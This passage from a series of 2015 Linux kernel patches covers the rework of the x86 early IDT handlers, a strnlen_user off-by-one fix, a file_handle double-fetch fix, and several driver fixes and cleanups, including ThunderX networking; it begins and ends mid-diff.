a/arch/x86/include/asm/segment.h b/arch/x86/include/asm/segment.h index 5a9856eb12ba..7d5a1929d76b 100644 --- a/arch/x86/include/asm/segment.h +++ b/arch/x86/include/asm/segment.h @@ -231,11 +231,21 @@ #define TLS_SIZE (GDT_ENTRY_TLS_ENTRIES* 8) #ifdef __KERNEL__ + +/* + * early_idt_handler_array is an array of entry points referenced in the + * early IDT. For simplicity, it's a real array with one entry point + * every nine bytes. That leaves room for an optional 'push $0' if the + * vector has no error code (two bytes), a 'push $vector_number' (two + * bytes), and a jump to the common entry code (up to five bytes). + */ +#define EARLY_IDT_HANDLER_SIZE 9 + #ifndef __ASSEMBLY__ -extern const char early_idt_handlers[NUM_EXCEPTION_VECTORS][2+2+5]; +extern const char early_idt_handler_array[NUM_EXCEPTION_VECTORS][EARLY_IDT_HANDLER_SIZE]; #ifdef CONFIG_TRACING -# define trace_early_idt_handlers early_idt_handlers +# define trace_early_idt_handler_array early_idt_handler_array #endif /* diff --git a/arch/x86/kernel/head64.c b/arch/x86/kernel/head64.c index 2b55ee6db053..5a4668136e98 100644 --- a/arch/x86/kernel/head64.c +++ b/arch/x86/kernel/head64.c @@ -167,7 +167,7 @@ asmlinkage __visible void __init x86_64_start_kernel(char * real_mode_data) clear_bss(); for (i = 0; i < NUM_EXCEPTION_VECTORS; i++) - set_intr_gate(i, early_idt_handlers[i]); + set_intr_gate(i, early_idt_handler_array[i]); load_idt((const struct desc_ptr *)&idt_descr); copy_bootdata(__va(real_mode_data)); diff --git a/arch/x86/kernel/head_32.S b/arch/x86/kernel/head_32.S index d031bad9e07e..53eeb226657c 100644 --- a/arch/x86/kernel/head_32.S +++ b/arch/x86/kernel/head_32.S @@ -478,21 +478,22 @@ is486: __INIT setup_once: /* - * Set up a idt with 256 entries pointing to ignore_int, - * interrupt gates. It doesn't actually load idt - that needs - * to be done on each CPU. Interrupts are enabled elsewhere, - * when we can be relatively sure everything is ok. + * Set up a idt with 256 interrupt gates that push zero if there + * is no error code and then jump to early_idt_handler_common. + * It doesn't actually load the idt - that needs to be done on + * each CPU. Interrupts are enabled elsewhere, when we can be + * relatively sure everything is ok. */ movl $idt_table,%edi - movl $early_idt_handlers,%eax + movl $early_idt_handler_array,%eax movl $NUM_EXCEPTION_VECTORS,%ecx 1: movl %eax,(%edi) movl %eax,4(%edi) /* interrupt gate, dpl=0, present */ movl $(0x8E000000 + __KERNEL_CS),2(%edi) - addl $9,%eax + addl $EARLY_IDT_HANDLER_SIZE,%eax addl $8,%edi loop 1b @@ -524,26 +525,28 @@ setup_once: andl $0,setup_once_ref /* Once is enough, thanks */ ret -ENTRY(early_idt_handlers) +ENTRY(early_idt_handler_array) # 36(%esp) %eflags # 32(%esp) %cs # 28(%esp) %eip # 24(%rsp) error code i = 0 .rept NUM_EXCEPTION_VECTORS - .if (EXCEPTION_ERRCODE_MASK >> i) & 1 - ASM_NOP2 - .else + .ifeq (EXCEPTION_ERRCODE_MASK >> i) & 1 pushl $0 # Dummy error code, to make stack frame uniform .endif pushl $i # 20(%esp) Vector number - jmp early_idt_handler + jmp early_idt_handler_common i = i + 1 + .fill early_idt_handler_array + i*EARLY_IDT_HANDLER_SIZE - ., 1, 0xcc .endr -ENDPROC(early_idt_handlers) +ENDPROC(early_idt_handler_array) - /* This is global to keep gas from relaxing the jumps */ -ENTRY(early_idt_handler) +early_idt_handler_common: + /* + * The stack is the hardware frame, an error code or zero, and the + * vector number. + */ cld cmpl $2,(%esp) # X86_TRAP_NMI @@ -603,7 +606,7 @@ ex_entry: is_nmi: addl $8,%esp /* drop vector number and error code */ iret -ENDPROC(early_idt_handler) +ENDPROC(early_idt_handler_common) /* This is the default interrupt "handler" :-) */ ALIGN diff --git a/arch/x86/kernel/head_64.S b/arch/x86/kernel/head_64.S index ae6588b301c2..df7e78057ae0 100644 --- a/arch/x86/kernel/head_64.S +++ b/arch/x86/kernel/head_64.S @@ -321,26 +321,28 @@ bad_address: jmp bad_address __INIT - .globl early_idt_handlers -early_idt_handlers: +ENTRY(early_idt_handler_array) # 104(%rsp) %rflags # 96(%rsp) %cs # 88(%rsp) %rip # 80(%rsp) error code i = 0 .rept NUM_EXCEPTION_VECTORS - .if (EXCEPTION_ERRCODE_MASK >> i) & 1 - ASM_NOP2 - .else + .ifeq (EXCEPTION_ERRCODE_MASK >> i) & 1 pushq $0 # Dummy error code, to make stack frame uniform .endif pushq $i # 72(%rsp) Vector number - jmp early_idt_handler + jmp early_idt_handler_common i = i + 1 + .fill early_idt_handler_array + i*EARLY_IDT_HANDLER_SIZE - ., 1, 0xcc .endr +ENDPROC(early_idt_handler_array) -/* This is global to keep gas from relaxing the jumps */ -ENTRY(early_idt_handler) +early_idt_handler_common: + /* + * The stack is the hardware frame, an error code or zero, and the + * vector number. + */ cld cmpl $2,(%rsp) # X86_TRAP_NMI @@ -412,7 +414,7 @@ ENTRY(early_idt_handler) is_nmi: addq $16,%rsp # drop vector number and error code INTERRUPT_RETURN -ENDPROC(early_idt_handler) +ENDPROC(early_idt_handler_common) __INITDATA From 429770823d961187c39df490d49683c467b10065 Mon Sep 17 00:00:00 2001 From: Peter Ujfalusi Date: Tue, 26 May 2015 13:11:28 +0300 Subject: [PATCH 583/872] dmaengine: hsu: Fix memory leak when stopping a running transfer The vd->node is removed from the lists when the transfer started so the vchan_get_all_descriptors() will not find it. This results memory leak. Signed-off-by: Peter Ujfalusi [andy: fix the typo to prevent a compilation error] Signed-off-by: Andy Shevchenko Signed-off-by: Vinod Koul --- drivers/dma/hsu/hsu.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/dma/hsu/hsu.c b/drivers/dma/hsu/hsu.c index 9b84def7a353..f42f71e37e73 100644 --- a/drivers/dma/hsu/hsu.c +++ b/drivers/dma/hsu/hsu.c @@ -384,7 +384,10 @@ static int hsu_dma_terminate_all(struct dma_chan *chan) spin_lock_irqsave(&hsuc->vchan.lock, flags); hsu_dma_stop_channel(hsuc); - hsuc->desc = NULL; + if (hsuc->desc) { + hsu_dma_desc_free(&hsuc->desc->vdesc); + hsuc->desc = NULL; + } vchan_get_all_descriptors(&hsuc->vchan, &head); spin_unlock_irqrestore(&hsuc->vchan.lock, flags); From a26484bb7e77d474ecef1ef01ce37fb16fb84f60 Mon Sep 17 00:00:00 2001 From: Alban Bedel Date: Sun, 19 Apr 2015 14:30:01 +0200 Subject: [PATCH 584/872] MIPS: ath79: Add a missing new line in log message The memory setup log is missing a new line. Signed-off-by: Alban Bedel Cc: linux-mips@linux-mips.org Cc: Andrew Bresticker Cc: Qais Yousef Cc: Wolfram Sang Cc: Sergey Ryazanov Cc: Gabor Juhos Cc: linux-kernel@vger.kernel.org Patchwork: https://patchwork.linux-mips.org/patch/9771/ Signed-off-by: Ralf Baechle --- arch/mips/ath79/setup.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/ath79/setup.c b/arch/mips/ath79/setup.c index a73c93c3d44a..7fc8397d16f2 100644 --- a/arch/mips/ath79/setup.c +++ b/arch/mips/ath79/setup.c @@ -225,7 +225,7 @@ void __init plat_time_init(void) ddr_clk_rate = ath79_get_sys_clk_rate("ddr"); ref_clk_rate = ath79_get_sys_clk_rate("ref"); - pr_info("Clocks: CPU:%lu.%03luMHz, DDR:%lu.%03luMHz, AHB:%lu.%03luMHz, Ref:%lu.%03luMHz", + pr_info("Clocks: CPU:%lu.%03luMHz, DDR:%lu.%03luMHz, AHB:%lu.%03luMHz, Ref:%lu.%03luMHz\n", cpu_clk_rate / 1000000, (cpu_clk_rate / 1000) % 1000, ddr_clk_rate / 1000000, (ddr_clk_rate / 1000) % 1000, ahb_clk_rate / 1000000, (ahb_clk_rate / 1000) % 1000, From 5eda7861e347ffe927ecde5abd74d7b13ae938fa Mon Sep 17 00:00:00 2001 From: Rusty Russell Date: Mon, 1 Jun 2015 15:53:53 +0930 Subject: [PATCH 585/872] ia64: make cpu_callin_map non-volatile. cpumask_test_cpu() doesn't take volatile, unlike the obsoleted cpu_isset. The only place ia64 really cares is the spin waiting for a bit; udelay() is probably a barrier but insert barrier() to be sure. Signed-off-by: Rusty Russell Signed-off-by: Tony Luck --- arch/ia64/kernel/smpboot.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/arch/ia64/kernel/smpboot.c b/arch/ia64/kernel/smpboot.c index 15051e9c2c6f..b054c5c6e713 100644 --- a/arch/ia64/kernel/smpboot.c +++ b/arch/ia64/kernel/smpboot.c @@ -127,7 +127,7 @@ int smp_num_siblings = 1; volatile int ia64_cpu_to_sapicid[NR_CPUS]; EXPORT_SYMBOL(ia64_cpu_to_sapicid); -static volatile cpumask_t cpu_callin_map; +static cpumask_t cpu_callin_map; struct smp_boot_data smp_boot_data __initdata; @@ -477,6 +477,7 @@ do_boot_cpu (int sapicid, int cpu, struct task_struct *idle) for (timeout = 0; timeout < 100000; timeout++) { if (cpumask_test_cpu(cpu, &cpu_callin_map)) break; /* It has booted */ + barrier(); /* Make sure we re-read cpu_callin_map */ udelay(100); } Dprintk("\n"); From f18c34e483ff6b1d9866472221e4015b3a4698e4 Mon Sep 17 00:00:00 2001 From: Jan Kara Date: Tue, 2 Jun 2015 17:10:28 +0200 Subject: [PATCH 586/872] lib: Fix strnlen_user() to not touch memory after specified maximum If the specified maximum length of the string is a multiple of unsigned long, we would load one long behind the specified maximum. If that happens to be in a next page, we can hit a page fault although we were not expected to. Fix the off-by-one bug in the test whether we are at the end of the specified range. Signed-off-by: Jan Kara Cc: stable@vger.kernel.org Signed-off-by: Linus Torvalds --- lib/strnlen_user.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/lib/strnlen_user.c b/lib/strnlen_user.c index a28df5206d95..11649615c505 100644 --- a/lib/strnlen_user.c +++ b/lib/strnlen_user.c @@ -57,7 +57,8 @@ static inline long do_strnlen_user(const char __user *src, unsigned long count, return res + find_zero(data) + 1 - align; } res += sizeof(unsigned long); - if (unlikely(max < sizeof(unsigned long))) + /* We already handled 'unsigned long' bytes. Did we do it all ? */ + if (unlikely(max <= sizeof(unsigned long))) break; max -= sizeof(unsigned long); if (unlikely(__get_user(c,(unsigned long __user *)(src+res)))) From 161f873b89136eb1e69477c847d5a5033239d9ba Mon Sep 17 00:00:00 2001 From: Sasha Levin Date: Wed, 28 Jan 2015 15:30:43 -0500 Subject: [PATCH 587/872] vfs: read file_handle only once in handle_to_path We used to read file_handle twice. Once to get the amount of extra bytes, and once to fetch the entire structure. This may be problematic since we do size verifications only after the first read, so if the number of extra bytes changes in userspace between the first and second calls, we'll have an incoherent view of file_handle. Instead, read the constant size once, and copy that over to the final structure without having to re-read it again. Signed-off-by: Sasha Levin Cc: Al Viro Cc: stable@vger.kernel.org Signed-off-by: Linus Torvalds --- fs/fhandle.c | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/fs/fhandle.c b/fs/fhandle.c index 999ff5c3cab0..d59712dfa3e7 100644 --- a/fs/fhandle.c +++ b/fs/fhandle.c @@ -195,8 +195,9 @@ static int handle_to_path(int mountdirfd, struct file_handle __user *ufh, goto out_err; } /* copy the full handle */ - if (copy_from_user(handle, ufh, - sizeof(struct file_handle) + + *handle = f_handle; + if (copy_from_user(&handle->f_handle, + &ufh->f_handle, f_handle.handle_bytes)) { retval = -EFAULT; goto out_handle; From 5f0ee9d17aae628b22be86966471db65be21f262 Mon Sep 17 00:00:00 2001 From: Hans de Goede Date: Tue, 2 Jun 2015 10:40:50 -0700 Subject: [PATCH 588/872] Input: elantech - fix detection of touchpads where the revision matches a known rate MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Make the check to skip the rate check more lax, so that it applies to all hw_version 4 models. This fixes the touchpad not being detected properly on Asus PU551LA laptops. Cc: stable@vger.kernel.org Reported-and-tested-by: David Zafra Gómez Signed-off-by: Hans de Goede Signed-off-by: Dmitry Torokhov --- drivers/input/mouse/elantech.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c index 79363b687195..f181d73d9629 100644 --- a/drivers/input/mouse/elantech.c +++ b/drivers/input/mouse/elantech.c @@ -1376,10 +1376,11 @@ static bool elantech_is_signature_valid(const unsigned char *param) return true; /* - * Some models have a revision higher then 20. Meaning param[2] may - * be 10 or 20, skip the rates check for these. + * Some hw_version >= 4 models have a revision higher then 20. Meaning + * that param[2] may be 10 or 20, skip the rates check for these. */ - if (param[0] == 0x46 && (param[1] & 0xef) == 0x0f && param[2] < 40) + if ((param[0] & 0x0f) >= 0x06 && (param[1] & 0xaf) == 0x0f && + param[2] < 40) return true; for (i = 0; i < ARRAY_SIZE(rates); i++) From b5d724b1add6eabf3aa7276ab3454ea9f45eebd3 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Tue, 2 Jun 2015 19:57:08 +0200 Subject: [PATCH 589/872] ALSA: hda/realtek - Add a fixup for another Acer Aspire 9420 Acer Aspire 9420 with ALC883 (1025:0107) needs the fixup for EAPD to make the sound working like other Aspire models. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=94111 Cc: Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 80be33ce1a9e..0320cb523d9e 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -2168,6 +2168,7 @@ static const struct hda_fixup alc882_fixups[] = { static const struct snd_pci_quirk alc882_fixup_tbl[] = { SND_PCI_QUIRK(0x1025, 0x006c, "Acer Aspire 9810", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x0090, "Acer Aspire", ALC883_FIXUP_ACER_EAPD), + SND_PCI_QUIRK(0x1025, 0x0107, "Acer Aspire", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x010a, "Acer Ferrari 5000", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x0110, "Acer Aspire", ALC883_FIXUP_ACER_EAPD), SND_PCI_QUIRK(0x1025, 0x0112, "Acer Aspire 9303", ALC883_FIXUP_ACER_EAPD), From d768b678a8d9c572ad3c2c6ba71d9e7029b867a2 Mon Sep 17 00:00:00 2001 From: Robert Richter Date: Tue, 2 Jun 2015 11:00:18 -0700 Subject: [PATCH 590/872] net: thunderx: Cleanup duplicate NODE_ID macros, add nic_get_node_id() There are duplicate NODE_ID macro definitions. Move all of them to nic.h for usage in nic and bgx driver and introduce nic_get_node_id() helper function. This patch also fixes 64bit mask which should have been ULL by reworking the node calculation. Signed-off-by: Robert Richter Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nic.h | 10 ++++++++++ drivers/net/ethernet/cavium/thunder/nic_main.c | 4 +--- drivers/net/ethernet/cavium/thunder/thunder_bgx.c | 4 ++-- drivers/net/ethernet/cavium/thunder/thunder_bgx.h | 3 --- 4 files changed, 13 insertions(+), 8 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h index 9b0be527909b..4f426db54e42 100644 --- a/drivers/net/ethernet/cavium/thunder/nic.h +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -11,6 +11,7 @@ #include #include +#include #include "thunder_bgx.h" /* PCI device IDs */ @@ -398,6 +399,15 @@ union nic_mbx { struct bgx_link_status link_status; }; +#define NIC_NODE_ID_MASK 0x03 +#define NIC_NODE_ID_SHIFT 44 + +static inline int nic_get_node_id(struct pci_dev *pdev) +{ + u64 addr = pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM); + return ((addr >> NIC_NODE_ID_SHIFT) & NIC_NODE_ID_MASK); +} + int nicvf_set_real_num_queues(struct net_device *netdev, int tx_queues, int rx_queues); int nicvf_open(struct net_device *netdev); diff --git a/drivers/net/ethernet/cavium/thunder/nic_main.c b/drivers/net/ethernet/cavium/thunder/nic_main.c index 0f1f58b54bf1..3ca7ad882c10 100644 --- a/drivers/net/ethernet/cavium/thunder/nic_main.c +++ b/drivers/net/ethernet/cavium/thunder/nic_main.c @@ -23,8 +23,6 @@ struct nicpf { struct pci_dev *pdev; u8 rev_id; -#define NIC_NODE_ID_MASK 0x300000000000 -#define NIC_NODE_ID(x) ((x & NODE_ID_MASK) >> 44) u8 node; unsigned int flags; u8 num_vf_en; /* No of VF enabled */ @@ -851,7 +849,7 @@ static int nic_probe(struct pci_dev *pdev, const struct pci_device_id *ent) pci_read_config_byte(pdev, PCI_REVISION_ID, &nic->rev_id); - nic->node = NIC_NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)); + nic->node = nic_get_node_id(pdev); nic_set_lmac_vf_mapping(nic); diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index 020e11cf3fdd..cde604a93d5d 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -894,8 +894,8 @@ static int bgx_probe(struct pci_dev *pdev, const struct pci_device_id *ent) goto err_release_regions; } bgx->bgx_id = (pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM) >> 24) & 1; - bgx->bgx_id += NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)) - * MAX_BGX_PER_CN88XX; + bgx->bgx_id += nic_get_node_id(pdev) * MAX_BGX_PER_CN88XX; + bgx_vnic[bgx->bgx_id] = bgx; bgx_get_qlm_mode(bgx); diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h index 9d91ce44f8d7..f9e2170c488a 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h @@ -20,9 +20,6 @@ #define MAX_LMAC (MAX_BGX_PER_CN88XX * MAX_LMAC_PER_BGX) -#define NODE_ID_MASK 0x300000000000 -#define NODE_ID(x) ((x & NODE_ID_MASK) >> 44) - /* Registers */ #define BGX_CMRX_CFG 0x00 #define CMR_PKT_TX_EN BIT_ULL(13) From 4a4f87d8ca2e26c224569405e24282f521af9329 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:19 -0700 Subject: [PATCH 591/872] net: thunderx: fix constants This fixes sparse messages like this: drivers/net/ethernet/cavium/thunder/thunder_bgx.c:897:24: sparse: constant 0x300000000000 is so big it is long Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nicvf_main.c | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index abd446e6155b..f81182caedc2 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -326,11 +326,11 @@ static int nicvf_rss_init(struct nicvf *nic) rss->enable = true; /* Using the HW reset value for now */ - rss->key[0] = 0xFEED0BADFEED0BAD; - rss->key[1] = 0xFEED0BADFEED0BAD; - rss->key[2] = 0xFEED0BADFEED0BAD; - rss->key[3] = 0xFEED0BADFEED0BAD; - rss->key[4] = 0xFEED0BADFEED0BAD; + rss->key[0] = 0xFEED0BADFEED0BADULL; + rss->key[1] = 0xFEED0BADFEED0BADULL; + rss->key[2] = 0xFEED0BADFEED0BADULL; + rss->key[3] = 0xFEED0BADFEED0BADULL; + rss->key[4] = 0xFEED0BADFEED0BADULL; nicvf_set_rss_key(nic); From 2cd2a196af20784b9f0a464d0f336de01a074a8c Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:20 -0700 Subject: [PATCH 592/872] net: thunderx: introduce a function for mailbox access This fixes sparse message: drivers/net/ethernet/cavium/thunder/nicvf_main.c:153:25: sparse: cast to restricted __le64 Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- .../net/ethernet/cavium/thunder/nicvf_main.c | 27 ++++++++++++------- 1 file changed, 17 insertions(+), 10 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index f81182caedc2..989f005be9fd 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -110,17 +110,23 @@ u64 nicvf_queue_reg_read(struct nicvf *nic, u64 offset, u64 qidx) /* VF -> PF mailbox communication */ +static void nicvf_write_to_mbx(struct nicvf *nic, union nic_mbx *mbx) +{ + u64 *msg = (u64 *)mbx; + + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, msg[0]); + nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, msg[1]); +} + int nicvf_send_msg_to_pf(struct nicvf *nic, union nic_mbx *mbx) { int timeout = NIC_MBOX_MSG_TIMEOUT; int sleep = 10; - u64 *msg = (u64 *)mbx; nic->pf_acked = false; nic->pf_nacked = false; - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, msg[0]); - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, msg[1]); + nicvf_write_to_mbx(nic, mbx); /* Wait for previous message to be acked, timeout 2sec */ while (!nic->pf_acked) { @@ -146,12 +152,13 @@ int nicvf_send_msg_to_pf(struct nicvf *nic, union nic_mbx *mbx) static int nicvf_check_pf_ready(struct nicvf *nic) { int timeout = 5000, sleep = 20; + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_READY; nic->pf_ready_to_rcv_msg = false; - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 0, - le64_to_cpu(NIC_MBOX_MSG_READY)); - nicvf_reg_write(nic, NIC_VF_PF_MAILBOX_0_1 + 8, 1ULL); + nicvf_write_to_mbx(nic, &mbx); while (!nic->pf_ready_to_rcv_msg) { msleep(sleep); @@ -368,7 +375,9 @@ int nicvf_set_real_num_queues(struct net_device *netdev, static int nicvf_init_resources(struct nicvf *nic) { int err; - u64 mbx_addr = NIC_VF_PF_MAILBOX_0_1; + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_CFG_DONE; /* Enable Qset */ nicvf_qset_config(nic, true); @@ -382,9 +391,7 @@ static int nicvf_init_resources(struct nicvf *nic) } /* Send VF config done msg to PF */ - nicvf_reg_write(nic, mbx_addr, le64_to_cpu(NIC_MBOX_MSG_CFG_DONE)); - mbx_addr += (NIC_PF_VF_MAILBOX_SIZE - 1) * 8; - nicvf_reg_write(nic, mbx_addr, 1ULL); + nicvf_write_to_mbx(nic, &mbx); return 0; } From e610cb32b4205c921e26fc8c7e43af7ae3543148 Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:21 -0700 Subject: [PATCH 593/872] net: thunderx: rework mac address handling This fixes sparse message: drivers/net/ethernet/cavium/thunder/nicvf_main.c:385:40: sparse: cast to restricted __le64 Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/nic.h | 4 ++-- drivers/net/ethernet/cavium/thunder/nic_main.c | 8 +------- drivers/net/ethernet/cavium/thunder/nicvf_main.c | 8 ++------ drivers/net/ethernet/cavium/thunder/thunder_bgx.c | 4 ++-- drivers/net/ethernet/cavium/thunder/thunder_bgx.h | 4 ++-- 5 files changed, 9 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/nic.h b/drivers/net/ethernet/cavium/thunder/nic.h index 4f426db54e42..6479ce21f64c 100644 --- a/drivers/net/ethernet/cavium/thunder/nic.h +++ b/drivers/net/ethernet/cavium/thunder/nic.h @@ -301,7 +301,7 @@ struct nic_cfg_msg { u8 vf_id; u8 tns_mode; u8 node_id; - u64 mac_addr; + u8 mac_addr[ETH_ALEN]; }; /* Qset configuration */ @@ -331,7 +331,7 @@ struct sq_cfg_msg { struct set_mac_msg { u8 msg; u8 vf_id; - u64 addr; + u8 mac_addr[ETH_ALEN]; }; /* Set Maximum frame size */ diff --git a/drivers/net/ethernet/cavium/thunder/nic_main.c b/drivers/net/ethernet/cavium/thunder/nic_main.c index 3ca7ad882c10..6e0c03169a55 100644 --- a/drivers/net/ethernet/cavium/thunder/nic_main.c +++ b/drivers/net/ethernet/cavium/thunder/nic_main.c @@ -492,7 +492,6 @@ static void nic_handle_mbx_intr(struct nicpf *nic, int vf) u64 *mbx_data; u64 mbx_addr; u64 reg_addr; - u64 mac_addr; int bgx, lmac; int i; int ret = 0; @@ -555,12 +554,7 @@ static void nic_handle_mbx_intr(struct nicpf *nic, int vf) lmac = mbx.mac.vf_id; bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); -#ifdef __BIG_ENDIAN - mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) << 16; -#else - mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) >> 16; -#endif - bgx_set_lmac_mac(nic->node, bgx, lmac, (u8 *)&mac_addr); + bgx_set_lmac_mac(nic->node, bgx, lmac, mbx.mac.mac_addr); break; case NIC_MBOX_MSG_SET_MAX_FRS: ret = nic_update_hw_frs(nic, mbx.frs.max_frs, diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_main.c b/drivers/net/ethernet/cavium/thunder/nicvf_main.c index 989f005be9fd..54bba86c9534 100644 --- a/drivers/net/ethernet/cavium/thunder/nicvf_main.c +++ b/drivers/net/ethernet/cavium/thunder/nicvf_main.c @@ -197,8 +197,7 @@ static void nicvf_handle_mbx_intr(struct nicvf *nic) nic->vf_id = mbx.nic_cfg.vf_id & 0x7F; nic->tns_mode = mbx.nic_cfg.tns_mode & 0x7F; nic->node = mbx.nic_cfg.node_id; - ether_addr_copy(nic->netdev->dev_addr, - (u8 *)&mbx.nic_cfg.mac_addr); + ether_addr_copy(nic->netdev->dev_addr, mbx.nic_cfg.mac_addr); nic->link_up = false; nic->duplex = 0; nic->speed = 0; @@ -248,13 +247,10 @@ static void nicvf_handle_mbx_intr(struct nicvf *nic) static int nicvf_hw_set_mac_addr(struct nicvf *nic, struct net_device *netdev) { union nic_mbx mbx = {}; - int i; mbx.mac.msg = NIC_MBOX_MSG_SET_MAC; mbx.mac.vf_id = nic->vf_id; - for (i = 0; i < ETH_ALEN; i++) - mbx.mac.addr = (mbx.mac.addr << 8) | - netdev->dev_addr[i]; + ether_addr_copy(mbx.mac.mac_addr, netdev->dev_addr); return nicvf_send_msg_to_pf(nic, &mbx); } diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index cde604a93d5d..a58924cd47ed 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c @@ -163,7 +163,7 @@ void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status) } EXPORT_SYMBOL(bgx_get_lmac_link_state); -const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) +const u8 *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) { struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; @@ -174,7 +174,7 @@ const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid) } EXPORT_SYMBOL(bgx_get_lmac_mac); -void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac) +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const u8 *mac) { struct bgx *bgx = bgx_vnic[(node * MAX_BGX_PER_CN88XX) + bgx_idx]; diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h index f9e2170c488a..ba4f53b7cc2c 100644 --- a/drivers/net/ethernet/cavium/thunder/thunder_bgx.h +++ b/drivers/net/ethernet/cavium/thunder/thunder_bgx.h @@ -183,8 +183,8 @@ enum MCAST_MODE { void bgx_add_dmac_addr(u64 dmac, int node, int bgx_idx, int lmac); unsigned bgx_get_map(int node); int bgx_get_lmac_count(int node, int bgx); -const char *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid); -void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const char *mac); +const u8 *bgx_get_lmac_mac(int node, int bgx_idx, int lmacid); +void bgx_set_lmac_mac(int node, int bgx_idx, int lmacid, const u8 *mac); void bgx_get_lmac_link_state(int node, int bgx_idx, int lmacid, void *status); u64 bgx_get_rx_stats(int node, int bgx_idx, int lmac, int idx); u64 bgx_get_tx_stats(int node, int bgx_idx, int lmac, int idx); From 0c886a1dd7a753e423a6577fc0507763d1b5c46f Mon Sep 17 00:00:00 2001 From: Aleksey Makarov Date: Tue, 2 Jun 2015 11:00:22 -0700 Subject: [PATCH 594/872] net: thunderx: delete unused variables They were left from development stage Reported-by: kbuild test robot Signed-off-by: Aleksey Makarov Signed-off-by: David S. Miller --- drivers/net/ethernet/cavium/thunder/thunder_bgx.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/cavium/thunder/thunder_bgx.c b/drivers/net/ethernet/cavium/thunder/thunder_bgx.c index 